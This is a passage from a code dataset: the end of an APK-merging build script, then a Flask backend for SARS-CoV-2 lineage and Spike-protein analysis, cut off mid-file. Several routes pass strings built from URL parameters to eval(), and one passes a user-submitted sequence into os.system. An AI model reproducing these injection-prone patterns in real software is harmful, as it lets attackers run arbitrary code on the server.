tmp_dir_64)\n UnpackApk(args.apk_32bit, tmp_dir_32)\n\n ignores = ['META-INF', 'AndroidManifest.xml']\n if args.ignore_classes_dex:\n ignores += ['classes.dex', 'classes2.dex']\n if args.debug:\n # see http://crbug.com/648720\n ignores += ['webview_licenses.notice']\n\n dcmp = filecmp.dircmp(\n tmp_dir_64,\n tmp_dir_32,\n ignore=ignores)\n\n diff_files = GetDiffFiles(dcmp, tmp_dir_32)\n\n # Check that diff_files match exactly those files we want to insert into\n # the 64-bit APK.\n CheckFilesExpected(diff_files, expected_files, args.component_build)\n\n with zipfile.ZipFile(tmp_apk, 'w') as out_zip:\n exclude_patterns = ['META-INF/*']\n\n # If there are libraries for which we don't want the 32 bit versions, we\n # should remove them here.\n if args.loadable_module_32:\n exclude_patterns.extend(['*' + f for f in args.loadable_module_32 if\n f not in args.loadable_module_64])\n\n build_utils.MergeZips(out_zip, [args.apk_64bit], exclude_patterns)\n AddDiffFiles(diff_files, tmp_dir_32, out_zip, expected_files,\n args.component_build, args.uncompress_shared_libraries)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Merge a 32-bit APK into a 64-bit APK')\n # Using type=os.path.abspath converts file paths to absolute paths so that\n # we can change working directory without affecting these 
paths\n parser.add_argument('--apk_32bit', required=True, type=os.path.abspath)\n parser.add_argument('--apk_64bit', required=True, type=os.path.abspath)\n parser.add_argument('--out_apk', required=True, type=os.path.abspath)\n parser.add_argument('--zipalign_path', type=os.path.abspath)\n parser.add_argument('--keystore_path', required=True, type=os.path.abspath)\n parser.add_argument('--key_name', required=True)\n parser.add_argument('--key_password', required=True)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('--component-build', action='store_true')\n group.add_argument('--shared_library')\n parser.add_argument('--page-align-shared-libraries', action='store_true',\n help='Obsolete, but remains for backwards compatibility')\n parser.add_argument('--uncompress-shared-libraries', action='store_true')\n parser.add_argument('--debug', action='store_true')\n # This option shall only used in debug build, see http://crbug.com/631494.\n parser.add_argument('--ignore-classes-dex', action='store_true')\n parser.add_argument('--has-unwind-cfi', action='store_true',\n help='Specifies if the 32-bit apk has unwind_cfi file')\n parser.add_argument('--loadable_module_32', action='append', default=[],\n help='Use for each 32-bit library added via '\n 'loadable_modules')\n parser.add_argument('--loadable_module_64', action='append', default=[],\n help='Use for each 64-bit library added via '\n 'loadable_modules')\n args = parser.parse_args()\n\n if (args.zipalign_path is not None and\n not os.path.isfile(args.zipalign_path)):\n # If given an invalid path, fall back to try the default.\n logging.warning('zipalign path not found: %s', args.zipalign_path)\n logging.warning('falling back to: %s', DEFAULT_ZIPALIGN_PATH)\n args.zipalign_path = None\n\n if args.zipalign_path is None:\n # When no path given, try the default.\n if not os.path.isfile(DEFAULT_ZIPALIGN_PATH):\n return 'ERROR: zipalign path not found: %s' % DEFAULT_ZIPALIGN_PATH\n args.zipalign_path = DEFAULT_ZIPALIGN_PATH\n\n tmp_dir = tempfile.mkdtemp()\n tmp_dir_64 = os.path.join(tmp_dir, '64_bit')\n tmp_dir_32 = os.path.join(tmp_dir, '32_bit')\n tmp_apk = os.path.join(tmp_dir, 'tmp.apk')\n signed_tmp_apk = os.path.join(tmp_dir, 'signed.apk')\n new_apk = args.out_apk\n\n try:\n MergeApk(args, tmp_apk, tmp_dir_32, tmp_dir_64)\n\n SignAndAlignApk(tmp_apk, signed_tmp_apk, new_apk, args.zipalign_path,\n args.keystore_path, args.key_name, args.key_password)\n except ApkMergeFailure as exc:\n return 'ERROR: %s' % exc\n finally:\n shutil.rmtree(tmp_dir)\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n", "repo_name": "kiwibrowser/src", "sub_path": "android_webview/tools/apk_merger.py", "file_name": "apk_merger.py", "file_ext": "py", "file_size_in_byte": 10617, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": 
"attribute"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pylib.constants.ANDROID_SDK_BUILD_TOOLS_VERSION", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pylib.constants", "line_number": 28, "usage_type": "name"}, {"api_name": "zipfile.ZipFile", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pprint.pformat", "line_number": 107, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 109, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "util.build_utils.AddToZipHermetic", "line_number": 126, "usage_type": "call"}, {"api_name": "util.build_utils", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "finalize_apk.JarSigner", "line_number": 135, "usage_type": "call"}, {"api_name": "util.build_utils.CalledProcessError", "line_number": 141, "usage_type": "attribute"}, {"api_name": "util.build_utils", "line_number": 141, "usage_type": "name"}, {"api_name": "finalize_apk.AlignApk", "line_number": 145, "usage_type": "call"}, {"api_name": "util.build_utils.CalledProcessError", "line_number": 148, "usage_type": "attribute"}, {"api_name": "util.build_utils", "line_number": 148, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 155, "usage_type": "call"}, {"api_name": "filecmp.dircmp", "line_number": 199, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 210, "usage_type": "call"}, {"api_name": "util.build_utils.MergeZips", "line_number": 219, "usage_type": "call"}, {"api_name": "util.build_utils", "line_number": 219, "usage_type": "name"}, {"api_name": 
"argparse.ArgumentParser", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 256, "usage_type": "call"}, {"api_name": "os.path", "line_number": 256, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 258, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 259, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 264, "usage_type": "call"}, {"api_name": "os.path", "line_number": 264, "usage_type": "attribute"}, {"api_name": "tempfile.mkdtemp", "line_number": 268, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 269, "usage_type": "call"}, {"api_name": "os.path", "line_number": 269, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path", "line_number": 270, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 271, "usage_type": "call"}, {"api_name": "os.path", "line_number": 271, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 272, "usage_type": "call"}, {"api_name": "os.path", "line_number": 272, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 283, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 288, "usage_type": "call"}]} +{"seq_id": "34049418729", "text": "from flask import Flask\nfrom flask import request, jsonify, send_from_directory, send_file\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__)\ncors = CORS(app)\n\nimport pandas as pd\nfrom datetime import datetime\nimport json\nimport os\nimport statistics\nfrom faker import Factory\n\nimport fbprophet\nfrom matplotlib import pyplot as plt\n\nimport simplejson as json\n\nimport uuid\nimport shutil\nfrom auxiliar_functions import _get_mutations, _get_domain, _get_muts_in_domains, send_success_email\n\nimport Levenshtein\n\n#Access to the C/C++ libs\nimport ctypes\n\n#directory=\"/var/www/html/\"\n#host=\"localhost:5000\"\n#ip=\"127.0.0.1\"\n\ndirectory=\"/var/www/html/foca_backend/\"\nhost=\"127.0.0.1\"\nip=\"127.0.0.1\"\n\n@app.route(\"/\")\ndef principal():\n return \"FOCA\"\n\n@app.route('/static/results/<filename>')\ndef serve_static(filename):\n root_dir = os.path.dirname(os.getcwd())\n root_dir = directory\n return send_from_directory( os.path.join(root_dir, 'data_exportation'), filename)\n\n@app.route('/get_proteins', methods=['GET'])\ndef section0_get_proteins():\n proteins=[]\n f=open(directory+\"data/proteins.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n proteins.append(l)\n f.close()\n\n resp={\"msg\": proteins}\n\n return json.dumps(resp)\n\n@app.route('/get_locations', methods=['GET'])\ndef section0_get_locations():\n locations=[]\n f=open(directory+\"data/location.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n try:\n a=int(l)\n except:\n wrong=['bat','canine','cat','dog','dog ','env','gorilla','hamster','leopard','lion','mink','monkey','mouse','pangolin','snow_leopard','tiger']\n if(not l in wrong):\n locations.append(l)\n f.close()\n\n resp={\"msg\": locations}\n\n return json.dumps(resp)\n\n@app.route('/get_lineages', methods=['GET'])\ndef section0_get_lineages():\n 
lineages=[]\n f=open(directory+\"data/lineage.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n lineages.append(l)\n f.close()\n\n resp={\"msg\": lineages}\n\n return json.dumps(resp)\n\n@app.route('/get_status', methods=['GET'])\ndef section0_get_status():\n status=[]\n f=open(directory+\"data/demography/list_status.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n status.append(l)\n f.close()\n\n resp={\"msg\": status}\n\n return json.dumps(resp)\n\n@app.route('/last_update', methods=['GET'])\ndef section1_last_update():\n lu=\"\"\n f=open(directory+\"data/last_update.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n lu=l\n f.close()\n\n resp={\"msg\": lu}\n return json.dumps(resp)\n\n# Page demography analysis\n@app.route('/get_demography_plots', methods=['GET'])\ndef section_get_plots_demography():\n resp={\"error\": \"\"}\n with open(directory+'data/demography/global_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"global_geo_data\"]=dat\n \n with open(directory+'data/demography/global_info.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"global_geo_info\"]=dat\n \n with open(directory+'data/demography/by_age_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_age\"]=dat\n \n with open(directory+'data/demography/by_voc_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_voc\"]=dat\n \n with open(directory+'data/demography/by_patient_status_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_status\"]=dat\n \n with open(directory+'data/demography/age_by_voc_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_age_voc\"]=dat\n \n with open(directory+'data/demography/age_by_status_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_age_status\"]=dat\n \n with open(directory+'data/demography/status_by_voc_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_status_voc\"]=dat\n\n return json.dumps(resp)\n\n@app.route('/get_table_demography/<lineage>/<location>/<status>/<gender>/<age>', methods=['GET'])\ndef section_get_table_demography(lineage, location, status, gender, age):\n data={\"error\": \"\", \"columns\": [], \"table\": [], \"file_export\": \"/static/results/\"}\n \n uui=str(uuid.uuid4())\n \n df=pd.read_csv(directory+'data/demography/metadata_demography.tsv', sep='\\t')\n conditions=[]\n lineage=lineage.replace(\"-\",\".\")\n if(lineage!=\"All\"):\n conditions.append(' ( df[\"Lineage\"]==\"'+lineage+'\" ) ')\n \n if(location!=\"All\"):\n conditions.append(' ( df[\"Location\"]==\"'+location+'\" ) ')\n \n if(status!=\"All\"):\n conditions.append(' ( df[\"Status\"].str.contains(\"'+status+'\", na=False) ) ')\n \n if(gender!=\"All\"):\n conditions.append(' ( df[\"Gender\"]==\"'+gender+'\" ) ')\n \n if(age!=\"\"):\n conditions.append(' ( df[\"Age\"]>'+age+' ) ')\n \n condition=\"( \"+' & '.join(conditions)+\" )\"\n if(len(conditions)>0):\n df = df[ eval(condition) ]\n \n if(len(df)!=0):\n #g=open(directory+'data_exportation/'+uui+\".tsv\", \"w\")\n columns=[]\n data['columns']=[]\n for col in df.columns:\n columns.append(col)\n data['columns'].append({ \"title\" : col } )\n \n data['columns']=data['columns'][:-1]\n \n df.to_csv(directory+'data_exportation/'+uui+\".tsv\", sep=\"\\t\")\n df=df.iloc[:1000, :-1]\n #g.write( ('\\t'.join(columns))+\"\\n\")\n \n for i in range(len(df)):\n dat=list(df.iloc[i, :])\n c=0\n for d in dat:\n dat[c]=str(d)\n c+=1 \n \n if(i<1000):\n data[\"table\"].append( dat )\n #g.write( ('\\t'.join(dat))+\"\\n\")\n #g.close()\n \n data['file_export'] += uui+'.tsv'\n else:\n data['error']='There are 
no matches for your filters.'\n \n return json.dumps(data)\n\n# Page entropy vocs analysis\n@app.route('/entropy_position_analysis//////', methods=['GET'])\ndef section_entropy_position_analysis(lineage, protein, position, effect, count, proportion):\n groups={ 'Non Polar': ['G','A','V','C','P','L', 'I', 'M','W','F'], 'Polar': ['S','T','Y','N','Q'], 'Positive Charge': ['K','R','H'], 'Negative Charge': ['D','E'] }\n revg={\"del\": \"-\"}\n for g in groups:\n for aa in groups[g]:\n revg[aa]=g\n \n uui=str(uuid.uuid4())\n \n sr={}\n with open(directory+'data/snap_data.json', 'r') as fp:\n sr = json.load(fp) \n \n data={\"error\": \"\",\"table_entropy\": [], \"file_export\": \"/static/results/\"}\n \n # Generating table\n df=pd.read_csv(directory+'data/report_position_probabilities_by_lineage.tsv', sep='\\t')\n conditions=[]\n lineage=lineage.replace(\"-\",\".\")\n proportion=proportion.replace(\"-\",\".\")\n if(lineage!=\"All\"):\n conditions.append(' ( df[\"Lineage\"]==\"'+lineage+'\" ) ')\n \n if(protein!=\"All\"):\n cproteins=[]\n for m in protein.split(','):\n cproteins.append(' ( df[\"Protein\"]==\"'+m+'\" ) ')\n conditions.append(\"( \"+' | '.join(cproteins)+\" )\")\n \n if(position!=\"All\"):\n conditions.append(' ( df[\"Position\"]==\"'+position+'\" ) ')\n \n if(count!=\"\"):\n conditions.append(' ( df[\"Count\"]>'+count+' ) ')\n \n if(proportion!=\"\"):\n conditions.append(' ( df[\"Proportion\"]>'+proportion+' ) ')\n \n condition=\"( \"+' & '.join(conditions)+\" )\"\n if(len(conditions)>0):\n df = df[ eval(condition) ]\n \n if(len(df)!=0):\n g=open(directory+'data_exportation/'+uui+\".tsv\", \"w\")\n columns=[]\n data['columns']=[]\n for c in df.columns:\n columns.append(c)\n data['columns'].append({ \"title\" : c } )\n \n columns+=[\"SNAP effect\",\"SNAP prediction\"]\n data['columns']+=[{ \"title\" : 'SNAP effect' }, { \"title\": 'SNAP prediction' }]\n \n g.write( ('\\t'.join(columns))+\"\\n\")\n \n for i in range(len(df)):\n protein=df.iloc[i,1].lower()\n position = str(df.iloc[i,2])\n aas = df.iloc[i,5].split(\" to \")\n \n sn=[\"-\",\"-\"]\n if( protein+\"_\"+aas[0]+position+aas[1] in sr.keys()):\n sn=sr[protein+\"_\"+aas[0]+position+aas[1]]\n \n if(sn[0]==effect or effect==\"All\"):\n dat=list(df.iloc[i, :])+sn\n if(i<1000):\n data[\"table_entropy\"].append( dat )\n \n c=0\n for d in dat:\n dat[c]=str(d)\n c+=1 \n g.write( ('\\t'.join(dat))+\"\\n\")\n g.close()\n \n data['file_export'] += uui+'.tsv'\n else:\n data['error']='There are no matches for your filters.'\n \n return json.dumps(data)\n\n@app.route('/plot_entropy_position_analysis_by_period//', methods=['GET'])\ndef section_plot_entropy_position_analysis_by_period(lineage, location):\n # Generating plot over time\n fake = Factory.create()\n \n resp={}\n \n if(location==\"All\"):\n df=pd.read_csv(directory+'data/report_position_probabilities_by_lineage_period.tsv', sep='\\t')\n else:\n df=pd.read_csv(directory+\"data/entropy/\"+location.replace(\" \", \"-\")+\"_report_position_probabilities_by_lineage_period.tsv\", sep='\\t')\n df1 = df[ df[\"Lineage\"] == lineage ]\n \n data={}\n labels=[]\n colors={}\n \n the=1.5\n mo=datetime.now().month\n y=datetime.now().year\n mo=5\n y=2021\n \n back=['#39C9CF','#3180D4', '#20b2aa', '#bc8f8f', \"#E6E6FA\", \"#C68FDA\"]\n co=0\n # check positions that maintain hight entropy\n posi={}\n ids=[]\n for m in range(mo-5, mo+1):\n df=df1[ ( (df1['Month']==m) & (df1['Year']==y) ) ]\n if(len(df)>0):\n lab=str(m)+\"/\"+str(y)\n posi[lab]={}\n df=df.sort_values('Entropy', ascending=False) \n 
pos=[] \n for i in range(len(df)):\n y_=df.iloc[i,8] # for count\n y_=df.iloc[i,5] # for entropy\n if(y_ > the):\n p=str(df.iloc[i,4])\n if(not p in pos):\n pos.append(p)\n prot=df.iloc[i,3]\n posi[lab][prot+\"_\"+p]=y_\n if(not prot+\"_\"+p in ids):\n ids.append(prot+\"_\"+p)\n cnt={}\n for i in ids:\n cnt[i]=0\n for p in posi.keys():\n if(i in posi[p].keys()):\n cnt[i]+=1\n \n \n co=0\n for m in range(mo-5, mo+1):\n df=df1[ ( (df1['Month']==m) & (df1['Year']==y) ) ]\n if(len(df)>0):\n df=df.sort_values('Entropy', ascending=False)\n lab=str(m)+\"/\"+str(y)\n \n data[lab]=[ [], [], { 'color': back[co] } ]\n \n pos = []\n end = len(df)\n #if(end>20):\n # end=20\n \n for i in range(len(df)):\n y_=df.iloc[i,8] # for count\n y_=df.iloc[i,5] # for entropy\n if(y_ > the):\n p=str(df.iloc[i,4])\n if(not p in pos):\n prot=df.iloc[i,3]\n xlab=prot+\"_\"+p\n #if(xlab in cnt.keys()):\n # if(cnt[xlab]>2):\n pos.append(p)\n \n data[lab][0].append(xlab)\n data[lab][1].append(str(y_))\n \n if(len(pos)==3):\n break\n co+=1 \n \n bars=[]\n for k in data.keys():\n bars.append( { \"x\": data[k][0], \"y\": data[k][1], \"name\": k, \"marker\": data[k][2], \"type\": \"bar\" } )\n \n resp[\"error\"]=\"\"\n resp[\"data\"]=bars\n \n return json.dumps(resp)\n\n@app.route('/entropy_position_analysis_by_period//////', methods=['GET'])\ndef section_entropy_position_analysis_by_period(lineage, protein, position, effect, month, year):\n groups={ 'Non Polar': ['G','A','V','C','P','L', 'I', 'M','W','F'], 'Polar': ['S','T','Y','N','Q'], 'Positive Charge': ['K','R','H'], 'Negative Charge': ['D','E'] }\n revg={}\n for g in groups:\n for aa in groups[g]:\n revg[aa]=g\n \n uui=str(uuid.uuid4())\n \n data={\"error\": \"\", \"table_entropy\": [], \"file_export\": \"/static/results/\"}\n \n df=pd.read_csv(directory+'data/report_position_probabilities_by_lineage_period.tsv', sep='\\t')\n \n # Geenerating table\n sr={}\n with open(directory+'data/snap_data.json', 'r') as fp:\n sr = json.load(fp) \n \n conditions=[]\n lineage=lineage.replace(\"-\",\".\")\n if(lineage!=\"All\"):\n conditions.append(' ( df[\"Lineage\"]==\"'+lineage+'\" ) ')\n \n if(protein!=\"All\"):\n cproteins=[]\n for m in protein.split(','):\n cproteins.append(' ( df[\"Protein\"]==\"'+m+'\" ) ')\n conditions.append(\"( \"+' | '.join(cproteins)+\" )\")\n \n if(position!=\"All\"):\n conditions.append(' ( df[\"Position\"]=='+position+' ) ')\n \n if(month!=\"All\"):\n conditions.append(' ( df[\"Month\"]=='+month+' )')\n \n if(year!=\"All\"):\n conditions.append(' ( df[\"Year\"]=='+year+' ) ')\n \n condition=\"( \"+' & '.join(conditions)+\" )\"\n if(len(conditions)>0):\n df = df[ eval(condition) ]\n \n if(len(df)!=0):\n g=open(directory+'data_exportation/'+uui+\".tsv\", \"w\")\n columns=[]\n data['columns']=[]\n for c in df.columns:\n columns.append(c)\n data['columns'].append({ \"title\" : c } )\n \n columns+=[\"SNAP effect\",\"SNAP prediction\"]\n data['columns']+=[{ \"title\" : 'SNAP effect' }, { \"title\": 'SNAP prediction' }]\n \n g.write( ('\\t'.join(columns))+\"\\n\")\n \n for i in range(len(df)):\n protein=df.iloc[i,3].lower()\n position = str(df.iloc[i,4])\n aas = df.iloc[i,7].split(\" to \")\n \n sn=[\"-\",\"-\"]\n if( protein+\"_\"+aas[0]+position+aas[1] in sr.keys()):\n sn=sr[protein+\"_\"+aas[0]+position+aas[1]]\n \n if(sn[0]==effect or effect==\"All\"):\n dat=list(df.iloc[i, :])+sn\n if(i<1000):\n data[\"table_entropy\"].append( dat )\n \n c=0\n for d in dat:\n dat[c]=str(d)\n c+=1 \n g.write( ('\\t'.join(dat))+\"\\n\")\n g.close()\n \n 
data['file_export'] += uui+'.tsv'\n else:\n data['error']='There are no matches for your filters.'\n \n return json.dumps(data)\n\n# Page structural & functional analysis\n@app.route('/structural_functional_analysis', methods=['POST'])\ndef section_structural_analysis():\n groups={ 'Non Polar': ['G','A','V','C','P','L', 'I', 'M','W','F'], 'Polar': ['S','T','Y','N','Q'], 'Positive Charge': ['K','R','H'], 'Negative Charge': ['D','E'] }\n revg={}\n for g in groups:\n for aa in groups[g]:\n revg[aa]=g\n \n uui=str(uuid.uuid4())\n \n seq = request.form.get('sequence')\n user_email = request.form.get('email')\n \n f=open(directory+\"structural_effects/data/ref_sequence.fasta\",\"r\")\n for line in f:\n if(line.find(\">\")==-1):\n ref=line.replace(\"\\n\",\"\")\n f.close()\n \n flag=True\n if(seq.find(\"\\n\")!=-1):\n st=\"\"\n temp=seq.split(\"\\n\")\n for t in temp:\n if(t.find(\">\")!=-1):\n if(st!=\"\"):\n flag=False\n \n if(flag and t.find(\">\")==-1):\n st+=t.replace(\"*\", \"\")\n seq=st\n simi = Levenshtein.ratio(seq, ref) \n \n data={\"error\": \"\", \"error_email\": \"\", \"mutations\": \"\", \"domains\":\"\", \"rmsd\": \"\",\"table_mutations\": [],\"table_stability\": [], \"file_export\": \"/static/results/\"}\n \n if(simi > 0.4):\n os.system(\"bash \"+directory+\"structural_effects/run.sh \"+seq+\" \"+uui+\" \"+directory+\"\")\n \n sr={}\n snap=pd.read_csv(directory+\"structural_effects/spike.csv\", sep=\",\")\n var=list(snap.iloc[:,0])\n effect=list(snap.iloc[:,1])\n accuracy=list(snap.iloc[:,2])\n c=0\n for v in var:\n sr[v]=[effect[c], accuracy[c]]\n c+=1\n \n \n if(os.path.isfile(directory+\"structural_effects/\"+uui+\"/step1_report.txt\")):\n f=open(directory+\"structural_effects/\"+uui+\"/step1_report.txt\",\"r\")\n for line in f:\n l=line.replace(\"\\n\",\"\")\n if(l.find(\"RMSD\")!=-1):\n data['rmsd']=l.split(\":\")[1]\n f.close()\n \n if(os.path.isfile(directory+\"structural_effects/\"+uui+\"/mutations.txt\")):\n g=open(directory+\"structural_effects/\"+uui+\"/functional_mutations_report.tsv\",\"w\")\n g.write(\"Mutation\\tSNAP effect\\tSNAP prediction\\tAA group reference\\tAA group alternative\\n\")\n \n muts=[]\n pos=[]\n interest=[]\n f=open(directory+\"structural_effects/\"+uui+\"/mutations.txt\",\"r\")\n for line in f:\n l=line.replace(\"\\n\",\"\")\n \n muts.append(l[1:])\n pos.append(l[2:-1])\n \n ref=revg[l[1]]\n alt=\"del\"\n if(l[1:].find(\"-\")==-1):\n alt=revg[l[-1]]\n else:\n sr[l[1:]] = [\"-\", \"-\"]\n \n if(sr[l[1:]][0]=='effect'):\n interest.append(l[1:])\n \n dat=[ l[1:], sr[l[1:]][0], str(sr[l[1:]][1]), ref, alt ]\n \n data[\"table_mutations\"].append( dat )\n \n g.write(('\\t'.join(dat))+\"\\n\")\n f.close()\n \n if(len(pos) > 1):\n data[\"mutations\"] = \"(\"+(' or '.join(pos))+\")\"\n if(len(pos) == 1):\n data[\"mutations\"] = ' or '.join(pos)\n \n infodom = _get_domain(seq, \"Spike\") \n data['domains'] = infodom[0]\n data['domains'] = \"
    Mutation(s) of interest according to functional impact prediction: \"+(', '.join(interest))+\"
    \"\n domsspike=['PS51921-BCOV_S1_CTD','PS51922-BCOV_S1_NTD','PS51923-COV_S2_HR1','PS51924-COV_S2_HR2']\n refcds=['9-303','334-527','896-1001','1143-1225']\n dnotnew=[]\n cnotnew={}\n dnot=[]\n cnot={}\n dok=[]\n cd=0\n for dm in infodom[1]:\n if(dm in domsspike):\n dok.append(dm+\" (\"+infodom[2][cd]+\")\")\n else:\n dnotnew.append(dm+\" (\"+infodom[2][cd]+\")\")\n if(not dm in cnotnew.keys()):\n cnotnew[dm]=[dm+\" (\"+infodom[2][cd]+\")\", []]\n cnotnew[dm][1] += _get_muts_in_domains(seq, infodom[2][cd], pos, muts)\n cd+=1\n \n if(len(dok)0):\n data['domains']+=\"
    Spike Domains in this sequence: \"+('; '.join(dok))+\"
    \"\n \n if(len(dnot)>0):\n data['domains']+=\"
    Spike reference domains not found in this sequence:
      \"\n for k in cnot.keys():\n data['domains']+=\"
    • \"+cnot[k][0]\n if(len(cnot[k])>0):\n data['domains']+=\" - Mutation(s): \"+(', '.join(cnot[k][1]))\n data['domains']+=\"
    • \"\n data['domains']+=\"
    \"\n \n if(len(dnotnew)>0):\n data['domains']+=\"
    Extra Domains (not found in Spike reference protein):
      \"\n for k in cnotnew.keys():\n data['domains']+=\"
    • \"+cnotnew[k][0]\n if(len(cnotnew[k])>0):\n data['domains']+=\" - Mutation(s): \"+(', '.join(cnotnew[k][1]))\n data['domains']+=\"
    • \"\n data['domains']+=\"
    \"\n \n g.close()\n \n stab={ \"BackHbond\": \"Backbone H. Bonds\", \"SideHbond\": \"Sidechain H. Bonds\", \"Energy_VdW\": \"Energy Van der Walls\", \"Electro\": \"Eletrostatic\", \"Energy_SolvP\": \"Energy Solvent Polar\", \"Energy_SolvH\": \"Energy Solvent Hydrophobic\", \"Energy_vdwclash\": \"Energy Van der Walls clashes\", \"energy_torsion\": \"Energy of Torsions\", \"backbone_vdwclash\": \"Backbone Van der Walls Clashes\", \"Entropy_sidec\": \"Entropy Sidechain\", \"Entropy_mainc\": \"Entropy Mainchain\", \"water bonds\": \"Water Bonds\", \"helix dipole\": \"Helix Dipole\", \"loop_entropy\": \"Loop Entropy\", \"cis_bond\": \"Cis Bonds\", \"disulfide\": \"Disulfide\", \"kn electrostatic\": \"Electrostatic Kon\", \"partial covalent interactions\": \"Partial Covalent Interactions\", \"Energy_Ionisation\": \"Energy of Ionisation\", \"Entropy Complex\": \"Entropy of Complex\", \"Total\": \"Total Energy\" }\n \n if(os.path.isfile(directory+\"structural_effects/\"+uui+\"/step1_table_stability_comparison.tsv\")):\n df=pd.read_csv(directory+\"structural_effects/\"+uui+\"/step1_table_stability_comparison.tsv\", sep=\"\\t\")\n for i in range(len(df)):\n \n if(df.iloc[i, 1]!=\"backbone_vdwclash\" and df.iloc[i,1]!=\"kn electrostatic\"):\n df.iloc[i, 1] = stab[df.iloc[i, 1][:-1]]\n else:\n df.iloc[i, 1] = stab[df.iloc[i, 1]]\n \n if(df.iloc[i, 1]==\"Total Energy\"):\n diff = df.iloc[i,2]-df.iloc[i,3]\n if(abs(diff)>50):\n data['domains']+=\"
    According to the energy parameters of the stability analysis, the protein differs by \"+str(diff)+\" in total energy from the reference Spike protein, which indicates that structural properties such as solvent accessibility and secondary structure have changed. The complete table of the energy stability analysis was sent by e-mail.
    \"\n else:\n data['domains']+=\"
    According to the energy parameters of the stability analysis, the protein shows an acceptable difference in total energy from the Spike reference protein, which does not impact the structural properties. The complete table of the energy stability analysis was sent by e-mail.
